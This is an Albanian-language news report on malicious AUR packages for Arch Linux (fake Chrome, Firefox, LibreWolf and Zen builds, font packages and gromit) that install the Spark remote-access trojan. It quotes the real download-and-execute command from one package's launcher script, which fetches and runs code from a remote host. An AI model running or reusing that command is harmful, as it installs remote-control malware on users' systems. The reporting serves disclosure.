Në depozitat AUR të Arch Linux janë identifikuar edhe 6 paketa malinj

Në depozitarin AUR (Arch User Repository), i përdorur në Arch Linux për shpërndarjen e pakove nga zhvillues të tjerë, vazhdoi publikimi i kodit të keq, i integruar në pakot me ndërtimet jozyrtare të shfletuesve. Përveç pakove të dëmshme firefox-patch-bin, librewolf-fix-bin dhe zen-browser-patched-bin, që u identifikuan para dy javësh, në AUR u shtua paketa google-chrome-stable, e cila gjithashtu përmban një ndryshim që vendos një komponent të dëmshëm, duke ofruar akses të largët në sistem.

Në skedarin PKGBUILD të paketës problematike u identifikua vendosja e një skripti për të ekzekutuar shfletuesin google-chrome-stable.sh, ku ndër të tjera përmbante komandën 'python -c "$(curl https://segs.lol/9wUb1Z)"', e cila shkarkonte softuer të dëmshëm, i njohur nga shërbimi VirusTotal si Trojan Spark, i cili lejon menaxhimin e sistemit në distancë, nisjen e proceseve, transferimin e skedarëve, inspektimin e trafikut dhe dërgimin e fotografive të ekranit.

PaketĂ«n e dĂ«mshme google-chrome-stable e kishin shkarkuar dy ditĂ« mĂ« parĂ« dhe u eliminua nga administratorĂ«t e AUR pas pak orĂ«sh nga shfaqja e saj. Pothuajse menjĂ«herĂ« pas heqjes sĂ« google-chrome-stable nĂ« AUR u ngarkuan dy paketa tĂ« tjera tĂ« dĂ«mshme — 'chrome' dhe 'chrome-bin', tĂ« cilat pĂ«rmbanin njĂ« skenar tĂ« ngjashĂ«m pĂ«r vendosjen e softuerit tĂ« dĂ«mshĂ«m nĂ« sistemin e pĂ«rdoruesit.

Më pas u identifikuan edhe tri paketa të tjera me kod të keq: ttf-mac-fonts-all, ttf-ms-fonts-all dhe gromit.

Burimi: opennet.ru

Bli njĂ« hosting tĂ« besueshĂ«m pĂ«r faqet me mbrojtje DDoS, VPS VDS serverĂ« đŸ”„ Bli njĂ« hosting tĂ« besueshĂ«m pĂ«r faqet me mbrojtje DDoS, VPS VDS serverĂ« | ProHoster